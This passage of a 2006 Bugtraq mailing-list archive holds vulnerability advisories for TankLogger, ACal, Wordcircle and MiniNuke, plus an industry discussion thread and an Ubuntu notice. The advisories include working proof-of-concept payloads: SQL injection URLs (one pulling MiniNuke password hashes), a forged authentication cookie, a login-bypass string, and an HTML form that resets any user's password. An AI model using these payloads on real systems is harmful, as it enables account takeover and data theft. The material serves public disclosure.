vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.
From - Thu Jan 12 18:53:07 2006
X-UIDL: 43c6ebe200000001
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-22848-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id C178532CF7
for <lists@securityspace.com>; Thu, 12 Jan 2006 18:51:10 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 15:28:08 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id B4A8E23AB75; Thu, 12 Jan 2006 15:58:44 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11236 invoked from network); 12 Jan 2006 14:16:31 -0000
Date: 12 Jan 2006 21:57:16 -0000
Message-ID: <20060112215716.7129.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: alex@evuln.com
To: bugtraq@securityfocus.com
Subject: [eVuln] TankLogger SQL Injection Vulnerability
Status:
New eVuln Advisory:
TankLogger SQL Injection Vulnerability
--------------------Summary----------------
Software: TankLogger
Sowtware's Web Site:
http://tanklogger.sourceforge.net/
Versions: 2.4
Critical Level: Moderate
Type: SQL Injection
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
eVuln ID: EV0026
-----------------Description---------------
Vulnerable script:
general_functions.php
Variables $livestock_id tank_id isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: gpc_magic_quotes: off
--------------Exploit----------------------
SQL Injection Example:
http://host/exp/tanklogger/showInfo.php?livestock_id�'%20union%20select%201,2,3,4,5,6,7,8,9/*
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Original Advisory:
http://evuln.com/vulns/26/summary.html
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
From - Thu Jan 12 19:03:07 2006
X-UIDL: 43c6ee3b00000001
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-22847-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 261DE32CF7
for <lists@securityspace.com>; Thu, 12 Jan 2006 19:01:25 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 15:38:21 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 3FFAC23B1D0; Thu, 12 Jan 2006 15:58:40 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 10880 invoked from network); 12 Jan 2006 14:16:01 -0000
Date: 12 Jan 2006 21:56:16 -0000
Message-ID: <20060112215616.7042.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: alex@evuln.com
To: bugtraq@securityfocus.com
Subject: [eVuln] ACal Authentication Bypass & PHP Code Insertion
Status:
New eVuln Advisory:
ACal Authentication Bypass & PHP Code Insertion
--------------------Summary----------------
Software: ACal
Sowtware's Web Site:
http://acalproj.sourceforge.net/
Versions: 2.2.5
Critical Level: Dangerous
Type: PHP Code Execution
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
eVuln ID: EV0025
-----------------Description---------------
Vulnerabe script: login.php
To authorize any user forum scripts checks only one cookie variable: ACalAuthenticate
Forum dont make password comparison.
Registered users can modify header.php and footer.php files. System access is possible.
--------------Exploit----------------------
Cookie: ACalAuthenticate=inside
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Original Advisory:
http://evuln.com/vulns/25/summary.html
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
From - Thu Jan 12 19:13:07 2006
X-UIDL: 43c6f09200000001
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-22849-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 0E83A32CF7
for <lists@securityspace.com>; Thu, 12 Jan 2006 19:11:04 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 15:48:00 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 33B5723B219; Thu, 12 Jan 2006 15:58:49 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11611 invoked from network); 12 Jan 2006 14:17:31 -0000
Date: 12 Jan 2006 21:58:15 -0000
Message-ID: <20060112215815.7215.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: alex@evuln.com
To: bugtraq@securityfocus.com
Subject: [eVuln] Wordcircle Authentication Bypass
Status:
New eVuln Advisory:
Wordcircle Authentication Bypass
--------------------Summary----------------
Software: Wordcircle
Sowtware's Web Site:
http://www.wordcircle.org/
Versions: 2.17
Critical Level: Moderate
Type: SQL Injection
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
eVuln ID: EV0027
-----------------Description---------------
Vulnerable scripts:
v_login.php
User-defined password isn't properly sanitized before being used in a SQL query. This can be used to log in as administrator without password.
Condition: gpc_magic_quotes: off
--------------Exploit----------------------
Login Page:
http://host/index.php?a=login
Enter your email address: any
Enter your password: a' or 1/*
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Original Advisory:
http://evuln.com/vulns/27/summary.html
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
From - Thu Jan 12 19:23:07 2006
X-UIDL: 43c6f2ea00000002
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-22850-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 1A8EC32D31
for <lists@securityspace.com>; Thu, 12 Jan 2006 19:18:14 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 16:18:12 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id C044C23B1E1; Thu, 12 Jan 2006 15:58:53 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 13022 invoked from network); 12 Jan 2006 14:20:30 -0000
Date: 12 Jan 2006 22:01:14 -0000
Message-ID: <20060112220114.7515.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: alex@evuln.com
To: bugtraq@securityfocus.com
Subject: [eVuln] Wordcircle Multiple SQL Injection & XSS Vulnerabilities
Status:
New eVuln Advisory:
Wordcircle Multiple SQL Injection & XSS Vulnerabilities
--------------------Summary----------------
Software: Wordcircle
Sowtware's Web Site:
http://www.wordcircle.org/
Versions: 2.17
Critical Level: Moderate
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
eVuln ID: EV0028
-----------------Description---------------
Most of user defined data isn't properly sanitized. This can be used to make any SQL query by injecting arbitrary SQL code or insert any javascript code.
--------------Exploit----------------------
Cross-Site Scriptong Example.
Page:
http://host/index.php?frm=mine
(need to be logged in)
Course name: <XSS>
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Original Advisory:
http://evuln.com/vulns/28/summary.html
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
From - Thu Jan 12 19:43:07 2006
X-UIDL: 43c6f79a00000001
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-22851-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 355CB32CDB
for <lists@securityspace.com>; Thu, 12 Jan 2006 19:27:50 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 16:04:47 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 34C6B23B235; Thu, 12 Jan 2006 15:58:58 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 22466 invoked from network); 12 Jan 2006 13:03:57 -0000
Message-ID: <20060112223217.19zxscpdiagwoo0g@webmail.nukedx.com>
Date: Thu, 12 Jan 2006 22:32:17 -0600
From: nukedx@nukedx.com
To: submit@milw0rm.com, full-disclosure@lists.grok.org.uk,
bugtraq@securityfocus.com, orhankara@soulshosting.com
Subject: Advisory: MiniNuke CMS System <= 1.8.2 (news.asp) SQL Injection
vulnerability
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="=_d7vk00he79s"
Content-Transfer-Encoding: 7bit
User-Agent: Internet Messaging Program (IMP) H3 (4.0.3)
Status:
This message is in MIME format.
--=_d7vk00he79s
Content-Type: text/plain;
charset=ISO-8859-9
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
--Security Report--
Advisory: MiniNuke CMS System <= 1.8.2 (news.asp) SQL Injection vulnerability
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 12/01/06 08:47 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web:
http://www.nukedx.com
}
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can inject SQL query to the news.asp
---
How&Example: GET ->
http://[site]/news.asp?Action=Print&hid=[SQLQuery]
http://www.miniex.net/news.asp?Action=Print&hidf%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_idR
Columns of MEMBERS:
uye_id = userid
sifre = md5 password hash
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
icq = ICQ Uin
msn = MSN Sn.
aim = AIM Sn.
meslek = job
cinsiyet = gender
yas = age
url = url
imza = signature
mail_goster = show mail :P
avurl = avatar url
avatar = avatar
--
Thanks to ajan;)
Regards,
>From the NWPX team,
nuker a.k.a nukedx
--=_d7vk00he79s
--=_d7vk00he79s--
From - Thu Jan 12 19:43:07 2006
X-UIDL: 43c6f79a00000002
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-22852-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id D2AB232CDB
for <lists@securityspace.com>; Thu, 12 Jan 2006 19:35:05 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 16:35:04 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id E1EE923B222; Thu, 12 Jan 2006 15:59:02 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 23389 invoked from network); 12 Jan 2006 13:08:28 -0000
Message-ID: <20060112223643.e5oeda8tdk0k80gc@webmail.nukedx.com>
Date: Thu, 12 Jan 2006 22:36:43 -0600
From: nukedx@nukedx.com
To: submit@milw0rm.com, full-disclosure@lists.grok.org.uk,
bugtraq@securityfocus.com, orhankara@soulshosting.com
Subject: Advisory: MiniNuke CMS System <= 1.8.2 (membership.asp) remote
user password change exploit
References: <20060112223217.19zxscpdiagwoo0g@webmail.nukedx.com>
In-Reply-To: <20060112223217.19zxscpdiagwoo0g@webmail.nukedx.com>
MIME-Version: 1.0
Content-Type: text/plain;
charset=ISO-8859-9;
format="flowed"
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
User-Agent: Internet Messaging Program (IMP) H3 (4.0.3)
Status:
--Security Report--
Advisory: MiniNuke CMS System <= 1.8.2 (membership.asp) remote user password
change exploit
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 12/01/06 08:49 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web:
http://www.nukedx.com
}
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can change any users password without
login.
---
How&Example:
HTML Example
[code]
<html>
<title>MiniNuke <= 1.8.2 remote user password change</title>
<form method="POST" action="
http://[SITE]/membership.asp?action=lostpassnew">
<table border="0" cellspacing="1" cellpadding="0" align="center" width="75%">
<tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the
blanks</font></td></tr>
<tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password
</font></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD:
</font></td>
<td width="50%"><input type="text" name="pass" size="20"></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again :
</font></td>
<td width="50%"><input type="text" name="passa" size="20"><input type="text"
name="x" value="Membername">
<input type="submit" value="Send" name="B1" style="font-family: Verdana;
font-size: 10px; border: 1px ridge #FFFFFF; background-color:
#FFFFFF"></td></tr>
</table></form>
</html>
[/code]
--
Regards,
From the NWPX team,
nuker a.k.a nukedx
From - Fri Jan 13 01:27:31 2006
X-UIDL: 43c7485200000001
X-Mozilla-Status: 0011
X-Mozilla-Status2: 10000000
Return-Path: <bugtraq-return-22822-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 9A4C032CEF
for <lists@securityspace.com>; Fri, 13 Jan 2006 01:17:50 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 21:54:47 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 101E6144C1C; Wed, 11 Jan 2006 13:59:52 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 8078 invoked from network); 9 Jan 2006 21:37:47 -0000
From: "D. Hazelton" <dhazelton@enter.net>
To: bugtraq@securityfocus.com, Gadi Evron <ge@linuxbox.org>
Subject: Re: industry standards - current status [was: what we REALLY learned from WMF]
Date: Mon, 9 Jan 2006 23:21:15 -0500
User-Agent: KMail/1.8.1
References: <43BD9569.4090701@linuxbox.org> <00c501c61282$b0572f30$0a01a8c0@anchorsign.com> <43BEF5B6.9020306@linuxbox.org>
In-Reply-To: <43BEF5B6.9020306@linuxbox.org>
MIME-Version: 1.0
Content-Type: multipart/signed;
boundary="nextPart14224173.DgErngoNKe";
protocol="application/pgp-signature";
micalg=pgp-sha1
Content-Transfer-Encoding: 7bit
Message-Id: <200601092321.21471.dhazelton@enter.net>
X-Virus-Checker-Version: Enter.Net Virus Scanner 1.1
Status:
--nextPart14224173.DgErngoNKe
Content-Type: multipart/mixed;
boundary="Boundary-01=_8YzwD+DKCA9Ogq5"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
--Boundary-01=_8YzwD+DKCA9Ogq5
Content-Type: text/plain;
charset="windows-1252"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
I track this list to keep abreast of new bugs so I can try to take pro-active
steps with the systems I run. In this case I've been ignoring this thread
until now... About what I've seen of the five points in discussion here -
certainly. It does seem to be flame-bait.
Now onto the content...
On Friday 06 January 2006 17:56, Gadi Evron wrote:
<snip>
> Microsoft did nothing wrong, in fact, they did great. Microsoft is an
> easy choice in this case because even though each case varies, they
> showed a capability here to deal with issues much faster than usual.
Agreed. MS is a company that has the resources and should be able to deal with
critical patches in this manner a great deal of the time. The same goes for
all other major software companies, as well - in concurrence with your note
below.
> Now, the point I am trying to make is not MS-specific, but rather about
> our standards in the industry.
>
> As an example, take false positives. A HUGE problem I[DP]S experts try
> and deal with every day, invest a lot of time in, and yet can't solve...
> therefore we got used in the industry to a level of false positives.
>
> Same goes to vulnerability scanners.. false positives appear as a way of
> nature.
False positives should be handled in a quiet manner by vendors, IMHO. If they
do otherwise it causes a drop in quality of information available. Not that
this is a feasable solution re: most software companies. In a number of
cases, as demonstrated by events at MS during the developement cycle of
Windows 95, there is a large amount of legacy code that isn't clearly
documented or isn't documented at all. For applications that are recent and
not prey to the ravages of poorly understood legacy code it can work.
> And yet, some vendors are different than others. In I[DP]S as well as
> vulnerability scanning. With some vendors, they invest less in features
> and more in eliminating false positives. They treat them as full-blown
> bugs rather than "something to live with". It works -- at least better
> than with others.
Ah, I see. Makes my previous statement a bit pointless, other than the truth
about my belief that software companies should actively work to eliminate
those false positives to increase the quality of information available to the
community.
<snip>
> In this case though, it is once again about standards. Microsoft shows
> Oracle is not alone, although they achieved amazing progress, especially
> in the last couple of years.
>
> If a patch can be put through full testing and released within days when
> it is taken seriously enough and resources are invested - no matter for
> what reason, I see no reason myself that this can't become common practice.
Agreed. Critical security patches should have a shortened development and
testing cycle so they can reach the end-users as fast as possible. Although,
in light of my (somewhat limited) knowledge of corporate practices and
policies this might take work to get any number of the larger companies to
understand.
> We should be practical in our demands, but if in practice this can be
> done in days, surely vendors can step it up a notch on critical issues.
> Microsoft runs on most of the computers on this planet, therefore they
> are to be treated different for better and for worse. A year+ of waiting
> for a patch while people might be exploited is unacceptable according to
> standards we should be upholding now that we know what is possible.
I do agree. See above section.
<snip>
In conclusion all I can say is that you addressed the seeming inconsistencies
noted in a clear manner and I happen to agree with it all. If the software
industry can change it's paradigms for inherent security - trying to make the
products harder to exploit from the design phase on - and change it's
handling of extremely critical security patches (Like MS did about the recent
WMF vuln) then the work of I[DP]S (to borrow your shorthand) professionals
will be made that much easier.
However I am not going to even dream that the industry will change in this
manner. That is something that I don't see happening unless the community and
various governmental agencies (in the US and other nations) begin to place
_serious_ and _continued_ pressure on the industry to change in that manner.
Since a large number of people across the globe would have to agree for that
to happen I cannot consider it a real possibility.
Although, I must say, if MS does for future critical security patches what it
did for the WMF patch, the rest of the industry may follow MicroSoft. Though
I like to bash MS as much as the next Linux user, they do have a huge segment
of the market for Operating Systems and business software. A large enough
segment that a change they make does have a chance of spreading through the
rest of the industry.
D. Hazelton
--Boundary-01=_8YzwD+DKCA9Ogq5
Content-Type: application/pgp-keys;
name="OpenPGP key 0xA6992F96300F159086FF28208F8280BB8B00C32A"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
filename=0xA6992F96300F159086FF28208F8280BB8B00C32A.asc
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.1 (GNU/Linux)
mQGiBEJS3C0RBADeLmOaFYR40Pd/n86pPD10DYJIiSuEEJJAovJI/E3kjYgKnom0
CmwPa9oEXf4B3FMVcqB0ksKrhA8ECVsNRwO91+LObFczyc59XBgYDScn9h9t+lu4
IZTObcR1SnQ/I+YdeJpd12ZcuLAnQ3EGl9+7bBOJgr4JcwM6Idixtg92kwCg4vhj
97BpUqPSk6cwD4LMRoqzABcEAJPZdEpYDwrXiy5aQx8ax+CbdfJX+XhxVcOrqzoI
8TS7yZPcE1rszCANpCb6xg7TReWyIOu+FQvfzLg5e7Cl2XtVC66RDgdlTBy/pjnX
fxIOIW5Hl+cVaWLBJ2tdAOIiyGPrKC/uTyY/N+4iQTsQK2l/yxc3fOgEN0g9AY9a
GSkHBACmX6awLcrdnxY0p2J/OmRtT4oOWcbq5TUchM9SzPLLIatGZEs7jUal9OYo
ZzmRPjElgM4koF7TTB+71FTUaqVGd0smJVKfJ1nVp6nefxOI6MH/v8/4j7Bvtb1Y
Ypkrxt+R8WWUI1L19yEDp55rvzqIkkLtmJZP/QJg2e7zxTYYi7Q5RGFuaWVsIFIu
IEhhemVsdG9uIChUaGUgU2hhZG93V29sZikgPGRoYXplbHRvbkBlbnRlci5uZXQ+
iF4EExECAB4FAkJS3C0CGwMGCwkIBwMCAxUCAwMWAgECHgECF4AACgkQj4KAu4sA
wyoRwwCeN+PEM8jpxxpxiG4dGyXNwTZBtNkAoKAtdOgeK66+zPEtJFanUeFe6lRX
uQENBEJS3DoQBACfejnq7GSJ7g8nL669pXDVFFrabOaiIC4sH0FgqbK+Oewm4h77
Ir5QL9SsHWvYSBYxnCODvR7zHv8HefWgJ4duC66b8PCXY/qcmxhRhYtdEssx/ncm
BhNXlPPvsyPT/e7PdZkDv7dJuVtVJrLVVeSniz+3KBIIYb395B+yhzjPLwAEDQP9
HFlaX9Duyg8c+RFhqStVrIluy7ZTg8pGjF2KLPsCmcSVzVLLhplF1M6Fs1CSgwRe
OCDRWPFohcaSxPIwIdlS0h2HOnWziPVpzh4HWylbtC6cZYg7dpgaDlJA00ikUlyj
6/bxwNwBuVoNSegIe0mN+xAIsvXM2TLuY1fFYcmeRxmISQQYEQIACQUCQlLcOgIb
DAAKCRCPgoC7iwDDKsoRAJwKJETliGVgcCSTMd7sq/WMOe9VAgCgxq4MRqWBvPWY
fPs99FjiIC8asFc=vwF/
-----END PGP PUBLIC KEY BLOCK-----
--Boundary-01=_8YzwD+DKCA9Ogq5--
--nextPart14224173.DgErngoNKe
Content-Type: application/pgp-signature
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
iD8DBQBDwzZBj4KAu4sAwyoRAsTKAJsEsH/H1wZXWcgNqJPM+1OtS+MA6ACcCHcF
UmxXwz0StqBjXXXHToJxwxE=MuMF
-----END PGP SIGNATURE-----
--nextPart14224173.DgErngoNKe--
From - Fri Jan 13 02:27:31 2006
X-UIDL: 43c7566200000003
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-22824-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id C54B332C9D
for <lists@securityspace.com>; Fri, 13 Jan 2006 02:27:17 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 23:04:14 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 1C50A144C8E; Wed, 11 Jan 2006 14:00:14 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 8121 invoked from network); 11 Jan 2006 10:33:05 -0000
Date: Wed, 11 Jan 2006 18:05:47 +0100
From: Martin Pitt <martin.pitt@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Subject: [USN-240-1] bogofilter vulnerability
Message-ID: <20060111170547.GB7125@piware.de>
MIME-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
protocol="application/pgp-signature"; boundary="oC1+HKm2/end4ao3"
Content-Disposition: inline
User-Agent: Mutt/1.5.11
Status:
--oC1+HKm2/end4ao3
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
==========================================================Ubuntu Security Notice USN-240-1 January 11, 2006
bogofilter vulnerability
CVE-2005-4591
==========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 5.10 (Breezy Badger)
The following packages are affected:
bogofilter
The problem can be corrected by upgrading the affected package to
version 0.95.2-1ubuntu1.1. In general, a standard system upgrade is
sufficient to effect the necessary changes.
Details follow:
A buffer overflow was found in bogofilter's character set conversion
handling. Certain invalid UTF-8 character sequences caused an invalid
memory access. By sending a specially crafted email, a remote attacker
could exploit this to crash bogofilter or possibly even execute
arbitrary code with bogofilter's privileges.
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter_0.95.2-1ubuntu1.1.diff.gz
Size/MD5: 10848 a3a01223665479ed500aee9b64d9669a
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter_0.95.2-1ubuntu1.1.dsc
Size/MD5: 638 bfedbfb65a22f9a482bfa1356a7bd761
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter_0.95.2.orig.tar.gz
Size/MD5: 866258 bdca7acd8cccff1976ab2ceab075830a
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter-bdb_0.95.2-1ubuntu1.1_amd64.deb
Size/MD5: 291350 8173d4c3d9c06420655d6b50c43c5b44
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter-common_0.95.2-1ubuntu1.1_amd64.deb
Size/MD5: 136588 f9ce89c4857c0d764100a72e22620a28
http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter_0.95.2-1ubuntu1.1_amd64.deb
